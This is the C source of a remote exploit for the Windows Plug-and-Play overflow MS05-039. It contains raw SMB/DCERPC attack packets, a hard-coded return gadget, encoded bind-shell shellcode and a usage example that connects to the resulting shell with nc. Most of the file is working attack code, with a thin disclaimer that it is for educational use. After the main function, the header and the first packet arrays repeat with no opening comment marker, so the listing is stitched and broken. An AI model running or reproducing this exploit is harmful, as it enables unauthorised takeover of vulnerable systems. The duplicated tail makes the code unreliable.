/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
*
* Copyright (c) 2005 houseofdabus.
*
* (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
* Universal Exploit + no crash shellcode
*
* .::[ houseofdabus ]::.
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution and local elevation of privilege
* vulnerability exists in Plug and Play that could allow an
* attacker who successfully exploited this vulnerability to take
* complete control of the affected system.
*
* This is a remote code execution and local privilege elevation
* vulnerability. On Windows 2000, an anonymous attacker could
* remotely try to exploit this vulnerability.
*
* On Windows XP Service Pack 1, only an authenticated user could
* remotely try to exploit this vulnerability.
 * On Windows XP Service Pack 2 and Windows Server 2003, only an
* administrator can remotely access the affected component.
* Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
* this is strictly a local privilege elevation vulnerability.
* An anonymous user cannot remotely attempt to exploit this
* vulnerability on Windows XP Service Pack 2 and Windows
* Server 2003.
*
* ---------------------------------------------------------------------
* Solution:
* www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
*
* ---------------------------------------------------------------------
* Systems Affected:
* - Windows Server 2003, SP1
* - Windows XP SP1, SP2
* - Windows 2000 SP4
*
* ---------------------------------------------------------------------
 * Tested on:
 * - Windows 2000 SP4
 *   The pop/pop/ret address hard-coded in RPC_call (0x767a1567, from
 *   umpnpmgr.dll) was taken from this build; verify it before pointing
 *   the tool at any other build.
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Linux : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
 * C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777
 *
 * connecting to 192.168.0.1:445...ok
 * null session...ok
 * bind pipe...ok
 * sending crafted packet...ok
 * check your shell on 192.168.0.1:7777
 * Ctrl+C
 *
 * C:\>nc 192.168.0.1 7777
 *
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\WINNT\system32>
*
* ---------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
*/
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#endif
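/*
 * Canned SMB / DCERPC requests as raw bytes. Each one starts with the
 * 4-byte NetBIOS session header (0x00 followed by a 24-bit big-endian
 * length of what follows) and the 0xFF 'S' 'M' 'B' signature; the SMB
 * command byte sits at offset 8. The arrays are string literals, so
 * every sizeof(X) - 1 in main() excludes the implicit NUL terminator.
 *
 * NOTE(review): the backslash of every "\x" escape had been lost in the
 * listing, turning these arrays into ASCII text; they are restored here.
 */

/* SMB_COM_NEGOTIATE (0x72) offering the dialects "PC NETWORK PROGRAM 1.0",
 * "LANMAN1.0", "Windows for Workgroups 3.1a", "LM1.2X002", "LANMAN2.1"
 * and "NT LM 0.12". */
unsigned char SMB_Negotiate[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";

/* SessionSetupAndX (0x73) carrying an NTLMSSP type-1 (negotiate) token;
 * native OS / LM strings "Windows 2000 2195" / "Windows 2000 5.0". */
unsigned char SMB_SessionSetupAndX[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";

/* Second SessionSetupAndX (0x73) with the NTLMSSP type-3 (authenticate)
 * token that completes the anonymous ("null") session. */
unsigned char SMB_SessionSetupAndX2[] =
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";

/* TreeConnectAndX (0x75) header only. main() appends the UTF-16LE
 * \\host\IPC$ path and SMB_TreeConnectAndX_, then patches the NetBIOS
 * length (byte 3, 0x5A here) and the ByteCount (3 bytes from the end). */
unsigned char SMB_TreeConnectAndX[] =
"\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";

/* UTF-16 NUL terminator for the path, then the "?????" service string. */
unsigned char SMB_TreeConnectAndX_[] =
"\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";

/* NTCreateAndX (0xA2) opening the "\browser" named pipe on IPC$. */
unsigned char SMB_PipeRequest_browser[] =
"\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"
"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"
"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";

/* SMB Transaction (0x25) on \PIPE\ carrying a DCERPC bind (ptype 0x0B)
 * to the PNP interface below, with the 32-bit NDR transfer syntax
 * 8a885d04-1ceb-11c9-9fe8-08002b104860. */
unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
"\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
"\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"
"\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"
"\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"
"\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";

/* SMB Transaction (0x25) carrying the DCERPC request (ptype 0x00,
 * opnum 0x36) whose string argument is "ROOT\SYSTEM\0000". The tail
 * after the fixed fields is a sled of "jmp +8 / pop pop ret" pairs;
 * main() follows it with bind_shellcode, pads the rest of the 2196-byte
 * transaction with 0x90 and places RPC_call_end near the end. */
unsigned char RPC_call[] =
"\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"
"\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"
"\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"
"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"
"\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"
"\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"
"\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
/* jmp over - entry point */
"\xEB\x08\x90\x90"
/* pop reg; pop reg; retn; - umpnpmgr.dll (build-specific, see "Tested on") */
"\x67\x15\x7a\x76" /* 0x767a1567 */
/* alternative gadget, jmp ebx - umpnpmgr.dll:
"\x6f\x36\x7a\x76" */
"\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

/* Trailing request fields, written by main() at a fixed offset from the
 * end of the 2196-byte transaction. */
unsigned char RPC_call_end[] =
"\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";

/* Encoded bind-shell payload. The listen port is patched in at offset
 * 186 by SET_PORTBIND_PORT; main() XORs it with 0x0437 first, so that
 * constant and this offset must stay in sync with the payload bytes. */
unsigned char bind_shellcode[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
"\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
"\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
"\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
"\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
"\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
"\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
"\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
"\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
"\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
"\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
"\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
"\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
"\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
"\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
"\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
"\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
"\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
"\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
"\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
"\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
"\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";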
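/*
 * Store a 16-bit port into bind_shellcode at offset 186, the slot the
 * encoded payload reserves for its listen port. main() passes
 * htons(port ^ 0x0437); the XOR presumably cancels the payload's own
 * decoding so the plain port ends up in memory -- keep that constant and
 * this offset in step with the payload bytes.
 *
 * Written through memcpy rather than a cast so the (possibly unaligned)
 * store is well defined. The macro keeps the original call spelling.
 *
 * NOTE(review): the line-continuation backslash of the original macro
 * had been lost in the listing, leaving an empty macro and a stray
 * statement; restored here as a function plus wrapper macro.
 */
static void
set_portbind_port(unsigned char *buf, unsigned short port)
{
    memcpy(buf + 186, &port, sizeof port);
}
#define SET_PORTBIND_PORT(buf, port) set_portbind_port((buf), (port))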
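/*
 * Widen an ASCII string to UTF-16LE: every byte of name becomes that byte
 * followed by 0x00. out must have room for 2 * strlen(name) bytes. No
 * terminator is written; callers append their own (SMB_TreeConnectAndX_
 * starts with the "\x00\x00" that ends the path).
 *
 * The copy runs from the end of the string toward the start, so out may
 * even overlap name's own storage -- each source byte is read before the
 * widened pair that covers it is written.
 *
 * An empty name writes nothing (the original stepped out to out - 1 in
 * that case, which is undefined even though the loop never ran).
 */
void
convert_name(char *out, char *name)
{
    size_t len = strlen(name);
    char *dst;

    if (len == 0)
        return;

    dst = out + len * 2 - 1;
    while (len--) {
        *dst-- = '\0';
        *dst-- = name[len];
    }
}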
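/*
 * Send one canned request and read one reply.
 *
 * Returns the reply length on success. Returns -1 (after printing the
 * same diagnostics the original flow printed) when the send fails, when
 * the reply is too short to hold an SMB header, or -- only if
 * check_status is non-zero -- when the low byte of the NT status field
 * (reply offset 9) is not zero. The first session-setup reply is not
 * status-checked, presumably because the NTLMSSP challenge comes back
 * with a non-success status; its caller passes check_status = 0.
 */
static int
smb_exchange(int sockfd, const unsigned char *req, size_t reqlen,
             char *resp, size_t resplen, int check_status)
{
    int n;

    if (send(sockfd, (const char *)req, (int)reqlen, 0) < 0) {
        printf("\n[-] send failed\n");
        return -1;
    }
    n = recv(sockfd, resp, (int)resplen, 0);
    if (n <= 10 || (check_status && resp[9] != 0)) {
        printf("\n[-] failed\n");
        return -1;
    }
    return n;
}

/*
 * Entry point: <host> <bind port>.
 *
 * Runs the whole exchange against host:445 -- SMB negotiate, two
 * NTLMSSP session-setup rounds (the "null session"), a tree connect to
 * \\host\IPC$, an NTCreateAndX on the \browser pipe, a DCERPC bind to the
 * PNP interface in SMB_PNPEndpoint, and finally the 2196-byte request
 * built from RPC_call, bind_shellcode and RPC_call_end. The bind port is
 * patched into the payload via SET_PORTBIND_PORT.
 *
 * Returns 0 when every request was acknowledged (which only shows the
 * packets were accepted, not that a listener is up) and 1 on any failure;
 * the original exited 0 on failure too, which hid errors from scripts.
 *
 * NOTE(review): all "\n"/"\t"/"\\" escapes and the '\0' constant had been
 * stripped from the listing; they are restored here.
 */
int
main (int argc, char **argv)
{
    struct sockaddr_in addr;
    struct hostent *he;
    int sockfd;
    long port;
    char *end;
    size_t hostlen;
    size_t pathlen;
    size_t total;
    unsigned short smblen;
    unsigned short bindport;
    char tmp[1024];
    unsigned char packet[4096];
    unsigned char *ptr;
    char recvbuf[4096];
#ifdef _WIN32
    WSADATA wsa;
    if (WSAStartup(MAKEWORD(2,0), &wsa) != 0) {
        printf("[-] WSAStartup failed\n");
        return 1;
    }
#endif

    printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
    printf("\t Universal Exploit + no crash shellcode\n\n\n");
    printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");

    if (argc < 3) {
        printf("%s <host> <bind port>\n", argv[0]);
        return 1;
    }

    /* The port is stored in the payload as 16 bits; reject what atoi()
     * would silently have truncated or mis-parsed. */
    port = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || port < 1 || port > 65535) {
        printf("[-] invalid bind port %s\n", argv[2]);
        return 1;
    }

    /* "\\\\" + host + "\\IPC$ " must fit tmp (8 literal characters). */
    hostlen = strlen(argv[1]);
    if (hostlen + 8 >= sizeof tmp) {
        printf("[-] host name too long\n");
        return 1;
    }

    if ((he = gethostbyname(argv[1])) == NULL || he->h_addrtype != AF_INET) {
        printf("[-] Unable to resolve %s\n", argv[1]);
        return 1;
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("[-] socket failed\n");
        return 1;
    }

    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(445);
    memcpy(&addr.sin_addr, he->h_addr, sizeof addr.sin_addr);

    printf("\n connecting to %s:445...", argv[1]);
    if (connect(sockfd, (struct sockaddr *)&addr, sizeof addr) < 0) {
        printf("\n[-] connect failed\n");
        return 1;
    }
    printf("ok\n");

    /* Negotiate, then the two NTLMSSP session-setup rounds. Per the header
     * notes only Windows 2000 lets an anonymous client get this far. */
    printf(" null session...");
    if (smb_exchange(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate) - 1,
                     recvbuf, sizeof recvbuf, 1) < 0)
        return 1;
    if (smb_exchange(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX) - 1,
                     recvbuf, sizeof recvbuf, 0) < 0)
        return 1;
    if (smb_exchange(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2) - 1,
                     recvbuf, sizeof recvbuf, 1) < 0)
        return 1;

    /* TreeConnectAndX to \\host\IPC$: the ASCII path is widened to
     * UTF-16LE in place, then the terminator and "?????" service follow.
     * The trailing space in the path is kept from the original. */
    sprintf(tmp, "\\\\%s\\IPC$ ", argv[1]);
    pathlen = strlen(tmp) * 2;
    total = sizeof(SMB_TreeConnectAndX) - 1 + pathlen + sizeof(SMB_TreeConnectAndX_) - 1;
    /* Both length fields below are written as a single byte (the NetBIOS
     * length's high bytes in the template are zero), so the request must
     * stay under 256 bytes after its 4-byte session header. */
    if (total - 4 > 0xFF) {
        printf("\n[-] host name too long\n");
        return 1;
    }
    ptr = packet;
    memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX) - 1);
    ptr += sizeof(SMB_TreeConnectAndX) - 1;
    convert_name((char *)ptr, tmp);
    ptr += pathlen;
    /* ByteCount = path bytes + the 9 fixed bytes around it (as in the
     * original). Assign the low byte directly: the original memcpy of one
     * byte from an unsigned short only worked on little-endian hosts. */
    smblen = (unsigned short)(pathlen + 9);
    packet[sizeof(SMB_TreeConnectAndX) - 1 - 3] = (unsigned char)smblen;
    memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_) - 1);
    ptr += sizeof(SMB_TreeConnectAndX_) - 1;
    /* NetBIOS session length excludes its own 4-byte header. */
    smblen = (unsigned short)(ptr - packet - 4);
    packet[3] = (unsigned char)smblen;
    if (smb_exchange(sockfd, packet, (size_t)(ptr - packet),
                     recvbuf, sizeof recvbuf, 1) < 0)
        return 1;
    printf("ok\n");

    /* Open \browser on IPC$, then DCERPC-bind the PNP interface over it. */
    printf(" bind pipe...");
    if (smb_exchange(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser) - 1,
                     recvbuf, sizeof recvbuf, 1) < 0)
        return 1;
    if (smb_exchange(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint) - 1,
                     recvbuf, sizeof recvbuf, 1) < 0)
        return 1;
    printf("ok\n");

    printf(" sending crafted packet...");
    /* Everything not explicitly written below stays 0x90 filler. */
    memset(packet, '\x90', sizeof packet);
    ptr = packet;
    memcpy(ptr, RPC_call, sizeof(RPC_call) - 1);
    ptr += sizeof(RPC_call) - 1;
    /* The port goes in pre-XORed with 0x0437 and in network order;
     * presumably this cancels the payload's own decoder so the plain port
     * lands in memory. Keep the constant in step with bind_shellcode. */
    bindport = (unsigned short)port;
    bindport ^= 0x0437;
    SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
    memcpy(ptr, bind_shellcode, sizeof(bind_shellcode) - 1);
    /* Trailing request fields sit at a fixed distance from the end of the
     * 2196-byte transaction (offset 2185 with a 13-byte RPC_call_end). */
    memcpy(packet + 2196 - sizeof(RPC_call_end) - 1 + 2,
           RPC_call_end,
           sizeof(RPC_call_end) - 1);
    if (send(sockfd, (const char *)packet, 2196, 0) < 0) {
        printf("\n[-] send failed\n");
        return 1;
    }
    printf("ok\n");
    printf(" check your shell on %s:%i\n", argv[1], (int)port);

    /* Block until the server answers or drops the connection, as the
     * original did; a successfully hit target may never reply. */
    recv(sockfd, recvbuf, (int)sizeof recvbuf, 0);
    return 0;
}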
*
* Copyright (c) 2005 houseofdabus.
*
* (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
* Universal Exploit + no crash shellcode
*
* .::[ houseofdabus ]::.
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution and local elevation of privilege
* vulnerability exists in Plug and Play that could allow an
* attacker who successfully exploited this vulnerability to take
* complete control of the affected system.
*
* This is a remote code execution and local privilege elevation
* vulnerability. On Windows 2000, an anonymous attacker could
* remotely try to exploit this vulnerability.
*
* On Windows XP Service Pack 1, only an authenticated user could
* remotely try to exploit this vulnerability.
 * On Windows XP Service Pack 2 and Windows Server 2003, only an
* administrator can remotely access the affected component.
* Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
* this is strictly a local privilege elevation vulnerability.
* An anonymous user cannot remotely attempt to exploit this
* vulnerability on Windows XP Service Pack 2 and Windows
* Server 2003.
*
* ---------------------------------------------------------------------
* Solution:
* www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
*
* ---------------------------------------------------------------------
* Systems Affected:
* - Windows Server 2003, SP1
* - Windows XP SP1, SP2
* - Windows 2000 SP4
*
* ---------------------------------------------------------------------
 * Tested on:
 * - Windows 2000 SP4
 *   The pop/pop/ret address hard-coded in RPC_call (0x767a1567, from
 *   umpnpmgr.dll) was taken from this build; verify it before pointing
 *   the tool at any other build.
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Linux : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
 * C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777
 *
 * connecting to 192.168.0.1:445...ok
 * null session...ok
 * bind pipe...ok
 * sending crafted packet...ok
 * check your shell on 192.168.0.1:7777
 * Ctrl+C
 *
 * C:\>nc 192.168.0.1 7777
 *
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\WINNT\system32>
*
* ---------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
*/
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#endif
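/*
 * Canned SMB / DCERPC requests as raw bytes. Each one starts with the
 * 4-byte NetBIOS session header (0x00 followed by a 24-bit big-endian
 * length of what follows) and the 0xFF 'S' 'M' 'B' signature; the SMB
 * command byte sits at offset 8. The arrays are string literals, so
 * every sizeof(X) - 1 in main() excludes the implicit NUL terminator.
 *
 * NOTE(review): the backslash of every "\x" escape had been lost in the
 * listing, turning these arrays into ASCII text; they are restored here.
 */

/* SMB_COM_NEGOTIATE (0x72) offering the dialects "PC NETWORK PROGRAM 1.0",
 * "LANMAN1.0", "Windows for Workgroups 3.1a", "LM1.2X002", "LANMAN2.1"
 * and "NT LM 0.12". */
unsigned char SMB_Negotiate[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";

/* SessionSetupAndX (0x73) carrying an NTLMSSP type-1 (negotiate) token;
 * native OS / LM strings "Windows 2000 2195" / "Windows 2000 5.0". */
unsigned char SMB_SessionSetupAndX[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";

/* Second SessionSetupAndX (0x73) with the NTLMSSP type-3 (authenticate)
 * token that completes the anonymous ("null") session. */
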